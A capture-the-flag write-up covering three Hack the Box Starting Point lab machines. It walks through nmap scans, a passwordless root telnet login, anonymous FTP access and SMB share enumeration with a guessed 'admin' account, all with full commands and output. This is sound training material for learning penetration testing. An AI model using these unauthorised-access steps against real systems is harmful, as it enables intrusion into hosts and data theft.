Starting Point on Hack the Box (HTB) is broken down into tiers and there are three. The first get the user familiar with the HTB interface. It also gets the user familiar with terminology and the pen testing mindset. Below is a short writeup for the first three tier 0 boxes.
Meow
Initial Recon
Ran a quick nmap scan against the box.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:25 CDT
Nmap scan report for 10.129.81.56
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.12 secondsLooking at the results shows a single port open – telnet on port 23.
Initial Access
Telnet
What is telnet? It is an application protocol that allows remote access to a host. Similar to Secure Shell (SSH) that is commonly seen on port 22. The main difference between the two is telnet traffic is in clear text and SSH is encrypted.
Telnet can be accessed using the telnet command. The only required argument is the remote system’s IP. Once connected, the remote host asks for a username. With a few guesses I find one that works and it happens to be root. Once authenticated simply list the available files and there is flag.txt, easy enough!
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ telnet $tgt 1 ⨯
Trying 10.129.81.56...
Connected to 10.129.81.56.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 16 May 2022 04:30:05 AM UTC
System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 138
Users logged in: 0
IPv4 address for eth0: 10.129.81.56
IPv6 address for eth0: dead:beef::250:56ff:feb9:ed8e
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 16 04:26:31 UTC 2022 on pts/0
root@Meow:~# ls -la
total 36
drwx------ 5 root root 4096 Jun 18 2021 .
drwxr-xr-x 20 root root 4096 Jul 7 2021 ..
lrwxrwxrwx 1 root root 9 Jun 4 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3132 Oct 6 2020 .bashrc
drwx------ 2 root root 4096 Apr 21 2021 .cache
-rw-r--r-- 1 root root 33 Jun 17 2021 flag.txt
drwxr-xr-x 3 root root 4096 Apr 21 2021 .localFawn
Initial Recon
Ran a quick nmap scan.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:40 CDT
Nmap scan report for 10.129.1.14
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.17 secondsLooking at the results shows a single port open – File Transfer Protocol (FTP) on port 21.
Initial Access
FTP
What is FTP? It is a protocol that facilitates the transfer of files between a client and server.
To connect to the FTP server simply use the ftp command. The only required argument is the remote system’s IP. Looking at our nmap scan shows that an anonymous FTP login is allowed so I do just that.
The username is anonymous and for the password press ENTER. After listing what files are in the current directory I see flag.txt. Using the get command I can pull that file down from the FTP server and to my attacking box. From there simply cat the file.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ftp $tgt
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:crimson): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50222|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49255|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************| 32 21.64 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.63 KiB/s)
ftp> exit
221 Goodbye.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ll
total 4
-rw-r--r-- 1 crimson crimson 32 Jun 3 2021 flag.txt
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ Dancing
Initial Recon
Started with a nmap scan.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:46 CDT
Nmap scan report for 10.129.1.12
Host is up (0.053s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-16T08:46:44
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: 4h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.43 secondsThere are a few open ports – Microsoft Remote Procedure Call (RPC) on 135, NetBIOS on port 139, and Server Message Block (SMB) on port 445.
Initial Access
SMB
What is SMB? It is a communication protocol created by Microsoft that facilitates shared access of files between hosts. For example, a server can have a share with files that other clients in the network can access remotely.
To list shares on a remote system with Kali Linux, use the smbclient command. In this scenario -U is used to specify a username. -N forces no password to be used. And -L gets a list of available shares from the specified host. After trying common usernames and passwords I came across valid credentials with the username admin and no password.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N -L \\$tgt
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.12 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableThe first three shares listed are common Windows shares. The last, WorkShares, is not. Using smbclient I can also access shares. To access a remote share I must provide valid credentials and the sharename.
After successfully connecting, I can use the dir command to list files. Eventually I find flag.txt. To pull that file from the SMB share to my local attacking box I use the get command. Once it is downloaded I can cat the file on my local system.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N \\\\$tgt\\WorkShares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Mar 29 03:22:01 2021
.. D 0 Mon Mar 29 03:22:01 2021
Amy.J D 0 Mon Mar 29 04:08:24 2021
James.P D 0 Thu Jun 3 03:38:03 2021
5114111 blocks of size 4096. 1732437 blocks available
smb: \> dir Amy.J\
. D 0 Mon Mar 29 04:08:24 2021
.. D 0 Mon Mar 29 04:08:24 2021
worknotes.txt A 94 Fri Mar 26 06:00:37 2021
5114111 blocks of size 4096. 1732055 blocks available
smb: \> get Amy.J\worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> dir James.P\
. D 0 Thu Jun 3 03:38:03 2021
.. D 0 Thu Jun 3 03:38:03 2021
flag.txt A 32 Mon Mar 29 04:26:57 2021
5114111 blocks of size 4096. 1732026 blocks available
smb: \> get James.P\flag.txt
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit